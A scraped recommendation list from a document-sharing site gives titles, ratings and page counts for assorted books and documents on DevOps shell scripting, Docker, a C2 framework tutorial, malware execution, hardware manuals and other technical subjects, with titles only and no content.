- Mastering Shell for DevOps: Automate, streamline, and secure DevOps workflows with modern shell scriptingFrom EverandMastering Shell for DevOps: Automate, streamline, and secure DevOps workflows with modern shell scriptingNo ratings yet
- Learn Docker - .NET Core, Java, Node.JS, PHP or Python: Learn CollectionFrom EverandLearn Docker - .NET Core, Java, Node.JS, PHP or Python: Learn Collection5/5 (4)
- Docker pour Débutants: Guide Pratique et Maîtrise de la ConteneurisationFrom EverandDocker pour Débutants: Guide Pratique et Maîtrise de la ConteneurisationNo ratings yet
- A New PowerShell Empire - The Covenant C2 TutorialNo ratings yetA New PowerShell Empire - The Covenant C2 Tutorial28 pages
- Move Aside Script Kiddies: Malware Execution in The Age of Advanced DefensesNo ratings yetMove Aside Script Kiddies: Malware Execution in The Age of Advanced Defenses38 pages
- PDF Formal Modeling and Verification of Cyber Physical Systems 1st International Summer School on Methods and Tools for the Design of Digital Systems Bremen Germany September 2015 1st Edition Rolf Drechsler download100% (4)PDF Formal Modeling and Verification of Cyber Physical Systems 1st International Summer School on Methods and Tools for the Design of Digital Systems Bremen Germany September 2015 1st Edition Rolf Drechsler download55 pages
- R700-Family Instruction Set ArchitectureNo ratings yetR700-Family Instruction Set Architecture392 pages
- IHMI Cycle Programming For Milling Exercises100% (1)IHMI Cycle Programming For Milling Exercises83 pages
- COOKING RECIPE DATABASE MANAGEMENT SYSTEMNo ratings yetCOOKING RECIPE DATABASE MANAGEMENT SYSTEM41 pages
- Emerging Trends in Online CommunicationsNo ratings yetEmerging Trends in Online Communications40 pages
- DSE72xx DSE73xx Configuration Suite Manual PDFNo ratings yetDSE72xx DSE73xx Configuration Suite Manual PDF134 pages
- Lesson 4: Creating Charts: Create A ChartNo ratings yetLesson 4: Creating Charts: Create A Chart8 pages
- Power System Operation and Control: Module: Eeen 521No ratings yetPower System Operation and Control: Module: Eeen 52147 pages
- VR Facial Animation Via Multiview Image Translation PDFNo ratings yetVR Facial Animation Via Multiview Image Translation PDF16 pages
- Vsphere Esxi Vcenter Server 652 Availability GuideNo ratings yetVsphere Esxi Vcenter Server 652 Availability Guide100 pages
